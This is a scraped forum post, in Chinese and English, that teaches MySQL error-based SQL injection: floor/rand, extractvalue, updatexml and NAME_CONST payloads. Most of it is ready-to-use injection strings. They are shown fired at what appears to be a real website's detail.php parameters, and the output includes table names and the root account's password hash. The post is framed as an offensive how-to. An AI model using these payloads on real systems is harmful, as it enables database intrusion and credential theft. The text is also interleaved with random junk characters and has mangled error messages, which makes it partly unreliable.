|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:0 d/ W8 u+ `1 A+ n i% ]
首先进行正常查询: mysql> select * from article where id = 1;
" j) C+ Q$ M9 v9 q8 S: d; Z4 b+—-+——-+———+0 ^ W) A* S$ `6 `) d/ T- e
| id | title | content |3 a; i. F% o. x8 @7 u
+—-+——-+———+* ^9 W; K/ A% Z+ D6 ?( z
| 1 | test | do it |
& C2 P `; i- m. h+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
5 T. b! m) o, x- C9 KERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
# g3 {2 v. |2 \ b* A+ @例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);2 c: f7 }: b7 E4 d
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));* m3 l7 w' C' m" Z
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue. e/ A$ E1 l- @# ]6 g7 X. r
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
: ~. `5 Y* x6 g% m% v- v W3 DERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ 4 W% q7 H; k) M6 v8 l) Y2 r
/ G& @" F8 G9 z% n- S: A再收集: 5 Q3 D& X: a7 z$ J
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) , U" Q% G( t$ y1 i1 r, J9 X
4 ^8 U: v9 r/ V$ S- H6 v
Error uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’
6 ^, {6 l9 L1 c' R% q( h! Z$ b# U) k( B C! E
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c); } u2 U1 Y2 v- i9 I, d3 m: M
4 ]4 o3 ^/ z, E* I0 FError uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ , O1 x: h7 y9 V* |
3 R2 l5 E7 L3 }' X9 O+ B* @
MYSQL高版本报错注入技巧-利用NAME_CONST注入
9 Y2 X2 q0 E& A' s9 {It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 2 w3 r# u* Q& q7 J. H/ n9 _
0 L* v5 Z2 l; Z5 c0 ~5 V1 ~) f& N0 W
$ s* Y. h E: K9 [/ D$ R
相关信息1 P& v+ V0 s4 V. y6 |
, _& k% g8 O. y4 `. |NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.* T7 @/ ]* `4 _% x
6 t9 K+ ^! T. k" G% Z
Code:
* K, W+ I5 s; f% {NAME_CONST(DATA, VALUE)9 |' d# w% p9 j- X o
4 b. `; G6 k- e$ s. P
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
" M, U& C, G- U9 z
. Z' a# S% ^- t: `6 A2 ^0 L- O! d( }SELECT NAME_CONST('TEST', 1)# d1 P# P9 D! ^; z0 H! |; h* q
4 O( c3 P7 v: i% b, x0 } @
- a! h+ z8 f! b/ A/ N" c2 O$ K
/ V( K; Q; O1 ^: m; R|---------------|
) ?& N5 [) K9 l/ ]! Y3 X: H+ w7 {| TEST |
+ z5 f |7 Q1 |" q| |1 A5 \9 @/ F7 Q
|---------------|, I6 }4 p) y5 ~$ S9 S4 k
| 1 |; S+ w) l# [ Y
| |
+ x% u( N a. I3 r; P% q/ ^% T|---------------|/ t) ^& I( Q% ?- K
6 J* q& \: f" O- O6 z `" P" _9 g9 b8 o' h
4 J' z" `- ^+ N8 Y' ~" o9 `% K" p
) o0 L' `. }/ khttp://dev.mysql.com/doc/refman/5.0/en/m...name-const9 q; h* w- \( h5 l% x
Intro to MySQL Variables/ f3 _. {- _ V1 J
3 F0 h! }1 l6 U
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
' M) L" }2 S- s' E0 s @
$ n9 S! r3 f$ c* V8 J1 j( FCode:
% a6 t. n, i6 @0 Q: [http://www.baido.hk/qcwh/content ... ;sid=19&cid=2610 Z h2 Q- x8 B" p @/ d* |
. J* ]- h; E0 A) U. g# ? N: n4 r% V+ _9 p! }; ~' n
5 @4 j/ U" D7 D+ k+ J9 J u! x# X
3 ~* ~ R/ j: J% O3 b
D$ K+ m M: G9 z0 [* t" w; FCode:
$ Z2 j: ~1 p1 sand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
% _# | f- J& C4 o( X W# n0 X4 o1 S M6 S
/ l' \$ F' A, s% \/ z$ H/ \2 H: R5 {VAR = Your MySQL variable.- _( s# t' k8 y1 R1 B- @
! e2 b9 z' L; C- GMySQL 5.1.3 Server System Variables
3 l, m2 ]' a1 \9 `) K
6 u# `" e3 y1 ^# W& q* }# i f2 sLet's try it out on my site..
$ s; u8 I: [3 _
# B0 W4 S, o3 l8 s) v$ E. XCode:
. R" i4 t8 {7 M! |http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
. h: t% [# c5 f" V4 p. `4 X. ~; h
Error uplicate column name '5.0.27-community-nt'
, W6 K* O# Q# Z1 M! B2 h5 c N. X w( N3 g! B" T! s8 I+ H" M% {
$ P+ A& r5 \' X4 l6 v8 w
( ~4 l, D d. J
& b% ~5 Y* W' z: k+ K
" P2 L: m/ r- C4 R) LNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...5 ~/ \# p9 z, y6 c5 S1 c
3 ]; R+ P4 ~* U6 SData Extraction
! s# p1 C6 B2 ~6 ^6 w) ?* I$ G8 J, {7 R* h' g8 V
Code:4 z, |/ y% z/ d. N5 Y4 ?* R1 A1 K
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--0 [; F# \: d5 U: T
" _0 |: A" r$ F7 E9 Z7 P& G+ ~
$ A" {& C' U9 u! J2 S, bWe should get a duplicate column 1 error...$ y9 s9 P/ F* [9 p- F
6 k0 Q5 m* I) iCode:; X# h' I" L% T; r
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
- f/ W. \ C/ j5 N) b! |; O+ h* U8 e1 ~7 _( b# [* V( x
Error uplicate column name '1
3 G+ B& G/ g9 ~
+ P" {, N- e, H$ g; R( U
5 R7 B) Y* u$ _% i0 _; u5 }$ `/ t
: x1 J! ^- x7 ?4 \! [# c. X8 v
5 b {2 D( G, q1 N/ z
* R: s0 J7 A- ?7 x7 @Now let's get the tables out this bitch..& i8 _5 ^/ F- w! b
5 o4 [* \' U- Z |( a
Code:% B7 S3 c6 h# c: E
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--" J2 e" O3 D+ y/ O
0 Y- i F# D/ H5 s4 ~) I$ N) Q
& V z! t1 ]$ s, |. v" pLet's see if it works here, if it does, we can go on and finish the job., E- _* `. x& s9 O8 y0 t
/ A8 s( {2 H. N7 GCode:" A8 {5 A" j \0 h- p
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
& W) [$ \2 q: k( x( r% E
& l# N- \. t, T) [
' E. F/ {. x. H, J0 e5 b/ sError uplicate column name 'com_admanage
" i9 N; }2 o9 t- h5 K' q7 n6 u7 A) d% P6 O3 @
1 f3 Z% I) I! f
5 }- e% D/ f8 t
% S' n" {, i! F% W; b# b! [; `
$ q, Y- k5 `, Z0 n8 D* [0 {; V
& p8 Z/ j) n" hNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.+ p5 b8 a! B: j% N! M
' z: Q+ j, V& q+ h' y. o% j
Let's get the columns out of the user table..% _! n2 ]: L5 d% F
' E/ S2 A" c; x" [0 `6 e
Code:
! E% @* I E3 I2 C% ?+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--2 c- P6 z4 a+ e$ [) p7 U; ?
V# `9 I. r* u' Q! V: q6 C1 B
% L& J6 r* E) s9 Z( H& d3 G; g% A9 x& QSo mine looks like this, and I get the duplicate column name 'Host'.
- o( D; C$ N" V+ ?
- Q6 v7 `- U( F0 B( R$ ZCode:
! h$ G( M4 `/ k1 z$ R$ Lhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
9 S y4 b- c( }5 @4 S' k u
. o) Y& T9 M0 m) Y, O" x: i" XError uplicate column name 'Host'" c$ |* M6 m! Q" ]$ G7 N% w
% L# c4 c3 y& g7 @4 K
/ Z! H& ~& N. Z& u$ l
" A! u1 f( }4 D% b: m; |5 Y4 s
/ |" b9 h3 Q! ^+ m& o
6 x$ d& C* U7 O1 Y% z* ^ T
7 B" a- j/ i! E" _Woot, time to finish this bitch off.
7 k2 a+ u0 R4 f; {4 a5 ~+ v( t; q" X6 ?& i
Code:5 f6 l. [, T' H5 K! T+ h
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--' ?! h& a! v5 t; A
* V' _* o7 z$ M/ H, f0 c6 a4 Q' Z6 j
3 Z" K- L$ @6 E) U5 d
So mine looks like this...0 m) ~0 i: q) a+ u) `, R
8 O/ e% P. D7 V
Code:
( L. F6 M! [( m# L6 Q- Chttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
: }% z( V. q z2 `* j$ ` W0 k% C1 Y( P* R6 l5 j1 ^
Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'8 ?- q2 ?; V- g6 B; L
) b4 v- g) x% t2 b% Q- {6 N9 ~
3 f( A$ t% b" P' |8 `
! A- P! q7 F# E( g5 ~0 `5 i1 b G7 o" C& Z( i
" v1 j5 r, v5 a+ A' v" F
, Y9 ]- K9 c- i& Q% kAnd there we have it, thanks for reading.
( D& E/ [0 p. R6 v$ [
6 I8 s, O2 Q4 ?" @ |